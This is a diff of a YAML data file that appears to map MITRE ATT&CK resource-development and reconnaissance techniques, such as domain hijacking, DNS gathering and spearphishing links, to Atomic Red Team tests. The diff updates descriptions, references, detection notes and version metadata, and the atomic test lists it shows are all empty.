       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.001:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-24T15:10:40.270Z'
       name: Domains
       description: |-
-        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
 
         Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
 
@@ -54993,19 +55661,19 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Jeremy Galloway
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.3'
-      x_mitre_contributors:
-      - Jeremy Galloway
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -55039,55 +55707,64 @@ resource-development:
         url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 reconnaissance:
   T1592:
     technique:
-      x_mitre_platforms:
-      - PRE
+      modified: '2024-10-03T19:35:07.269Z'
+      name: Gather Victim Host Information
+      description: |-
+        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: reconnaissance
+      x_mitre_contributors:
+      - Sam Seabrook, Duke Energy
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Internet Scan: Response Content'
       type: attack-pattern
+      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
       created: '2020-10-02T16:39:33.966Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1592
         url: https://attack.mitre.org/techniques/T1592
+        external_id: T1592
       - source_name: ATT ScanBox
-        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+      - source_name: TrellixQakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved August 1, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Gather Victim Host Information
-      description: |-
-        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
-        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: reconnaissance
-      x_mitre_detection: |-
-        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
-        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.1'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1596.003:
     technique:
@@ -55112,7 +55789,7 @@ reconnaissance:
         url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
         description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
           from Server (Site URL). Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:48:37.628Z'
       name: Digital Certificates
       description: |-
         Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -55128,8 +55805,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.002:
     technique:
@@ -55151,7 +55826,7 @@ reconnaissance:
         url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
         description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
           73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:44:43.900Z'
       name: Purchase Technical Data
       description: |-
         Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -55167,8 +55842,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.005:
     technique:
@@ -55196,7 +55869,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:05.302Z'
       name: IP Addresses
       description: |-
         Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -55212,33 +55885,33 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.002:
     technique:
-      modified: '2022-10-21T14:32:48.393Z'
+      modified: '2024-11-11T16:13:02.196Z'
       name: DNS
       description: |-
-        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
 
         Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
       created: '2020-10-02T15:47:10.102Z'
@@ -55252,18 +55925,29 @@ reconnaissance:
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
         url: https://www.circl.lu/services/passive-dns/
+      - source_name: DNS-CISA
+        description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+          Leak Domain Information. Retrieved June 5, 2024.
+        url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
       - source_name: DNS Dumpster
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
         url: https://dnsdumpster.com/
+      - source_name: Alexa-dns
+        description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+          June 5, 2024.
+        url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
       - source_name: Sean Metcalf Twitter DNS Records
         description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
-          May 27, 2022.
-        url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+          September 12, 2024.
+        url: https://x.com/PyroTek3/status/1126487227712921600
+      - source_name: Trails-DNS
+        description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+          the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+        url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.002:
     technique:
@@ -55284,7 +55968,7 @@ reconnaissance:
       - source_name: WHOIS
         url: https://www.whois.net/
         description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:50:44.113Z'
       name: WHOIS
       description: |-
         Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -55300,39 +55984,37 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1594:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
-      type: attack-pattern
-      created: '2020-10-02T16:51:50.306Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1594
-        url: https://attack.mitre.org/techniques/T1594
-      - source_name: Comparitech Leak
-        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
-        description: Bischoff, P. (2020, October 15). Broadvoice database of more
-          than 350 million customer records exposed online. Retrieved October 20,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-02T18:52:21.278Z'
       name: Search Victim-Owned Websites
-      description: |-
-        Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
-        Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+      description: "Adversaries may search websites owned by the victim for information
+        that can be used during targeting. Victim-owned websites may contain a variety
+        of details, including names of departments/divisions, physical locations,
+        and data about key employees such as names, roles, and contact info (ex: [Email
+        Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+        also have details highlighting business operations and relationships.(Citation:
+        Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+        actionable information. Information from these sources may reveal opportunities
+        for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+        or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+        establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+        or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+        initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+        or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+        to manually browsing the website, adversaries may attempt to identify hidden
+        directories or files that could contain additional sensitive information or
+        vulnerable functionality. They may do this through automated activities such
+        as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+        well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+        Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - James P Callahan, Professional Paranoid
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for suspicious network traffic that could be indicative
         of adversary reconnaissance, such as rapid successions of requests indicative
         of web crawling and/or large quantities of requests originating from a single
@@ -55340,13 +56022,41 @@ reconnaissance:
         Analyzing web metadata may also reveal artifacts that can be attributed to
         potentially malicious activity, such as referer or user-agent string HTTP/S
         fields.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+      created: '2020-10-02T16:51:50.306Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1594
+        external_id: T1594
+      - source_name: Perez Sitemap XML 2023
+        description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+          to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+          2024.
+        url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+      - source_name: Comparitech Leak
+        description: Bischoff, P. (2020, October 15). Broadvoice database of more
+          than 350 million customer records exposed online. Retrieved October 20,
+          2020.
+        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+      - source_name: Register Robots TXT 2015
+        description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+          you don't want them to look. Retrieved July 18, 2024.
+        url: https://www.theregister.com/2015/05/19/robotstxt/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.001:
     technique:
@@ -55371,7 +56081,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:13.409Z'
       name: DNS/Passive DNS
       description: |-
         Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -55387,8 +56097,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.003:
     technique:
@@ -55410,7 +56118,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:38:31.983Z'
       name: Identify Business Tempo
       description: |-
         Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -55426,8 +56134,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.001:
     technique:
@@ -55453,7 +56159,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:32:10.810Z'
       name: 'Gather Victim Host Information: Hardware'
       description: |-
         Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -55471,13 +56177,11 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1592.001
     atomic_tests: []
   T1598.003:
     technique:
-      modified: '2024-04-19T13:26:16.082Z'
+      modified: '2024-05-31T04:18:44.567Z'
       name: Spearphishing Link
       description: |-
         Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55533,7 +56237,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: TrendMictro Phishing
         description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
           October 20, 2020.
@@ -55584,7 +56288,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.004:
     technique:
@@ -55605,7 +56308,7 @@ reconnaissance:
       - source_name: DNS Dumpster
         url: https://dnsdumpster.com/
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:33:02.476Z'
       name: Network Topology
       description: |-
         Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -55621,8 +56324,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.003:
     technique:
@@ -55644,7 +56345,7 @@ reconnaissance:
         url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
         description: García, C. (2019, April 3). Pentesting Active Directory Forests.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:22.917Z'
       name: Network Trust Dependencies
       description: |-
         Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -55660,8 +56361,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.001:
     technique:
@@ -55683,7 +56382,7 @@ reconnaissance:
         url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
         description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
           Intelligence Feeds. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:45:30.862Z'
       name: Threat Intel Vendors
       description: |-
         Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -55699,12 +56398,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589:
     technique:
-      modified: '2024-04-19T04:27:00.005Z'
+      modified: '2024-09-16T16:09:45.794Z'
       name: Gather Victim Identity Information
       description: |-
         Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -55744,8 +56441,8 @@ reconnaissance:
         external_id: T1589
       - source_name: OPM Leak
         description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
       - source_name: Detectify Slack Tokens
         description: Detectify. (2016, April 28). Slack bot token leakage exposing
           business critical information. Retrieved October 19, 2020.
